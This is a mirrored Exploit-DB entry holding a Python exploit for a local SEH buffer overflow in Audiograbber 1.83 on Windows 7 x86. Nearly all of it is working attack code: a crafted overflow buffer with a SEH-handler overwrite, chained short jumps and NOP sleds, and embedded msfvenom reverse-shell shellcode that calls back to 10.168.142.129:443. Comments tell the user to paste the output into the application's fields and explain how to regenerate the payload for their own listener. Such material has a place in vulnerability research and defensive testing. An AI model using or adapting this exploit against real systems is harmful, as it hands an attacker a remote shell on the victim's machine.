Audiograbber 1.83 – Local Buffer Overflow (SEH)

  • 作者: Dennis 'dhn' Herrmann
    日期: 2018-06-18
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/44903/
  • # Exploit Title: Audiograbber 1.83 - Local Buffer Overflow (SEH)
    # Date: 2018-06-16
    # Exploit Author: Dennis 'dhn' Herrmann
    # Vendor Homepage: https://www.audiograbber.org/
    # Version: 1.83
    # Tested on: Windows 7 SP1 (x86)
    
    #!/usr/bin/env python
    # $Id: exploit.py,v 1.0 2018/06/16 13:25:59 dhn Exp $
    #
    # Tested with Windows 7 SP1 (x86)
    # Steps:
    #  1. Run this script; it writes poc.txt (the SEH-overwrite buffer) to the
    #     current directory.
    #  2. In Audiograbber 1.83 paste the contents of poc.txt into the
    #     "Interpret" or "Album" field. This is a local, user-assisted attack:
    #     it needs an interactive session on the target.
    
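    class Exploit:
        """Build the SEH-overwrite buffer for Audiograbber 1.83 and write it to disk.

        Buffer layout (byte offsets within the text that gets pasted):

          0..255    filler: 256 x 'A', reaching the SEH record
          256..259  nSEH: jmp short +8 (EB 08) plus two NOP pad bytes
          260..263  SEH:  0x10019179 little-endian, the POP/POP/RET gadget the
                    original author took from WMA8Connect.dll
          264..281  18 x NOP
          282..285  jmp short +8 plus two NOPs
          286..313  28 x NOP
          314..317  jmp short +8 plus two NOPs
          318..349  32 x NOP
          350..     shellcode

        Each EB 08 transfers control 8 bytes past itself, i.e. into the next NOP
        sled (offsets 266, 292 and 324); the author reports that parts of the
        buffer behind the SEH record are mangled by the application, and the
        chained short jumps hop over those stretches.

        Practitioner caveats: the gadget address is only valid for the module
        build the PoC was tested against (Windows 7 SP1 x86) and must be
        re-located for any other install; the PoC does not state whether
        WMA8Connect.dll is compiled without SafeSEH/ASLR, which is what makes a
        POP/POP/RET in it usable -- confirm before reusing the address.
        """

        # nSEH overwrite: EB 08 = jmp short +8, followed by two NOPs to fill the
        # 4-byte slot.  The jump skips the pad, the 4-byte handler address and
        # two more bytes, landing inside the NOP sled that follows.
        JMP_SHORT = "\xeb\x08\x90\x90"
        # SEH handler overwrite: 0x10019179 little-endian, the POP/POP/RET the
        # original author found in WMA8Connect.dll.  Build-specific -- see the
        # class docstring.  NOTE(review): SafeSEH/ASLR status of that module is
        # not stated in the PoC; confirm before relying on it.
        POP_POP_RET = "\x79\x91\x01\x10"
        NOP = "\x90"
        FILLER = "A" * 256

        def __init__(self, shellcode, output="poc.txt"):
            """Remember the shellcode and output path; nothing is written yet.

            shellcode: str (Python 2 or 3) or bytes (Python 3), e.g. the output
                       of msfvenom -f py.  It must avoid 0x00, 0x0a and 0x0d,
                       the bad characters excluded when the bundled payload
                       was generated.
            output:    path of the PoC file written by run(); defaults to the
                       historical "poc.txt" in the current directory.
            """
            if isinstance(shellcode, bytes) and not isinstance(shellcode, str):
                # Python 3 caller passed b"...": keep everything as text
                # internally so it concatenates with the str constants above.
                # latin-1 maps each byte to the code point of the same value.
                shellcode = shellcode.decode("latin-1")
            self._shellcode = shellcode
            self._output = output
            self._payload = None

        def __write(self):
            """Write the assembled payload to ``self._output`` byte-for-byte.

            The payload is built from hex-escape str literals.  Under Python 2
            str is already bytes; under Python 3 it is text, and a text-mode
            open(..., "w") would re-encode every value >= 0x80 (the jmp opcode,
            the SEH address, the decoder stub) as multi-byte UTF-8 and silently
            corrupt the PoC.  Encoding as latin-1 and writing in binary mode
            gives one byte per code point on both interpreters.
            """
            data = self._payload
            if not isinstance(data, bytes):
                data = data.encode("latin-1")
            with open(self._output, "wb") as fh:
                fh.write(data)

        def run(self):
            """Assemble the buffer described in the class docstring and write it.

            Returns None; the result is the file at ``self._output``.
            """
            chunks = [
                self.FILLER,                    # 0..255   reach the SEH record
                self.JMP_SHORT,                 # 256..259 nSEH -> jmp short +8
                self.POP_POP_RET,               # 260..263 SEH  -> POP/POP/RET
                # The author reports the application mangles parts of the
                # buffer past the SEH record; each sled ends in another
                # jmp short +8 that hops over the next damaged stretch.
                self.NOP * 18, self.JMP_SHORT,  # 264..285
                self.NOP * 28, self.JMP_SHORT,  # 286..317
                self.NOP * 32,                  # 318..349 final sled
                self._shellcode,                # 350..
            ]
            self._payload = "".join(chunks)
            self.__write()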
    
    def main():
        """Generate poc.txt carrying the bundled reverse-shell payload.

        The byte string below is the literal msfvenom output for the command in
        the comment: a windows/shell_reverse_tcp payload that connects back to
        10.168.142.129:443, run through x86/alpha_mixed so that 0x00, 0x0a and
        0x0d (the only bad characters the original author listed) do not occur.
        The callback address and port are baked into these bytes -- regenerate
        the shellcode with your own LHOST/LPORT, keeping the same encoder and
        bad-character list, before using the PoC.  The decoder stub that
        precedes the alphanumeric body (da cd d9 74 24 f4 ...) is not printable,
        so the payload must reach the file without any text re-encoding.
        """
        # msfvenom --platform windows -p windows/shell_reverse_tcp \
        # LHOST=10.168.142.129 LPORT=443 -b "\x00\x0a\x0d" \
        # -e x86/alpha_mixed -f py
        shellcode = "".join([
            "\xda\xcd\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49",
            "\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51",
            "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51",
            "\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50",
            "\x38\x41\x42\x75\x4a\x49\x39\x6c\x59\x78\x6f\x72\x77",
            "\x70\x73\x30\x73\x30\x43\x50\x4e\x69\x6b\x55\x55\x61",
            "\x69\x50\x32\x44\x6c\x4b\x76\x30\x70\x30\x6e\x6b\x50",
            "\x52\x54\x4c\x4c\x4b\x72\x72\x47\x64\x6c\x4b\x74\x32",
            "\x46\x48\x36\x6f\x6d\x67\x73\x7a\x67\x56\x74\x71\x6b",
            "\x4f\x4e\x4c\x37\x4c\x51\x71\x53\x4c\x53\x32\x34\x6c",
            "\x75\x70\x59\x51\x78\x4f\x56\x6d\x73\x31\x79\x57\x6b",
            "\x52\x4b\x42\x71\x42\x56\x37\x4c\x4b\x63\x62\x74\x50",
            "\x6e\x6b\x52\x6a\x57\x4c\x4c\x4b\x42\x6c\x54\x51\x32",
            "\x58\x4d\x33\x37\x38\x57\x71\x58\x51\x76\x31\x4e\x6b",
            "\x33\x69\x31\x30\x37\x71\x4e\x33\x6e\x6b\x61\x59\x47",
            "\x68\x4a\x43\x47\x4a\x43\x79\x4e\x6b\x76\x54\x6e\x6b",
            "\x37\x71\x38\x56\x74\x71\x59\x6f\x4c\x6c\x4b\x71\x78",
            "\x4f\x36\x6d\x36\x61\x68\x47\x75\x68\x6b\x50\x70\x75",
            "\x39\x66\x55\x53\x31\x6d\x4c\x38\x35\x6b\x73\x4d\x71",
            "\x34\x62\x55\x4a\x44\x73\x68\x4c\x4b\x31\x48\x61\x34",
            "\x76\x61\x58\x53\x30\x66\x6e\x6b\x76\x6c\x50\x4b\x4e",
            "\x6b\x31\x48\x35\x4c\x67\x71\x59\x43\x4c\x4b\x37\x74",
            "\x4c\x4b\x53\x31\x4e\x30\x4b\x39\x33\x74\x55\x74\x45",
            "\x74\x73\x6b\x43\x6b\x31\x71\x31\x49\x53\x6a\x43\x61",
            "\x4b\x4f\x79\x70\x63\x6f\x73\x6f\x70\x5a\x4c\x4b\x64",
            "\x52\x5a\x4b\x6c\x4d\x43\x6d\x52\x48\x30\x33\x67\x42",
            "\x37\x70\x73\x30\x35\x38\x34\x37\x53\x43\x76\x52\x33",
            "\x6f\x53\x64\x63\x58\x30\x4c\x33\x47\x76\x46\x44\x47",
            "\x6b\x4f\x38\x55\x6d\x68\x4a\x30\x37\x71\x47\x70\x47",
            "\x70\x55\x79\x69\x54\x76\x34\x46\x30\x35\x38\x45\x79",
            "\x6d\x50\x70\x6b\x57\x70\x79\x6f\x4a\x75\x56\x30\x56",
            "\x30\x30\x50\x46\x30\x73\x70\x30\x50\x43\x70\x72\x70",
            "\x62\x48\x4b\x5a\x44\x4f\x59\x4f\x6d\x30\x49\x6f\x7a",
            "\x75\x7a\x37\x51\x7a\x55\x55\x53\x58\x76\x6a\x6e\x48",
            "\x4c\x4e\x6e\x61\x73\x58\x44\x42\x67\x70\x47\x71\x4f",
            "\x4b\x4d\x59\x4d\x36\x53\x5a\x34\x50\x70\x56\x76\x37",
            "\x31\x78\x6e\x79\x49\x35\x44\x34\x53\x51\x49\x6f\x68",
            "\x55\x6d\x55\x6f\x30\x50\x74\x36\x6c\x69\x6f\x50\x4e",
            "\x56\x68\x52\x55\x6a\x4c\x73\x58\x6a\x50\x58\x35\x6c",
            "\x62\x46\x36\x59\x6f\x48\x55\x32\x48\x43\x53\x30\x6d",
            "\x63\x54\x77\x70\x6f\x79\x78\x63\x56\x37\x32\x77\x46",
            "\x37\x50\x31\x59\x66\x32\x4a\x46\x72\x53\x69\x62\x76",
            "\x79\x72\x59\x6d\x52\x46\x59\x57\x63\x74\x51\x34\x37",
            "\x4c\x76\x61\x66\x61\x6c\x4d\x61\x54\x44\x64\x42\x30",
            "\x6b\x76\x73\x30\x42\x64\x63\x64\x52\x70\x31\x46\x51",
            "\x46\x50\x56\x42\x66\x30\x56\x62\x6e\x71\x46\x76\x36",
            "\x36\x33\x71\x46\x42\x48\x74\x39\x7a\x6c\x55\x6f\x4f",
            "\x76\x59\x6f\x6b\x65\x4b\x39\x59\x70\x70\x4e\x66\x36",
            "\x30\x46\x59\x6f\x64\x70\x31\x78\x67\x78\x6c\x47\x67",
            "\x6d\x35\x30\x49\x6f\x78\x55\x4d\x6b\x58\x70\x6d\x65",
            "\x6f\x52\x36\x36\x73\x58\x6c\x66\x7a\x35\x4d\x6d\x6d",
            "\x4d\x59\x6f\x59\x45\x75\x6c\x53\x36\x31\x6c\x47\x7a",
            "\x6d\x50\x49\x6b\x79\x70\x70\x75\x36\x65\x6f\x4b\x77",
            "\x37\x62\x33\x61\x62\x70\x6f\x71\x7a\x45\x50\x61\x43",
            "\x6b\x4f\x69\x45\x41\x41",
        ])

        poc = Exploit(shellcode)
        poc.run()
    
    
    if __name__ == "__main__":
        # Script entry point: builds the PoC file in the current directory.
        main()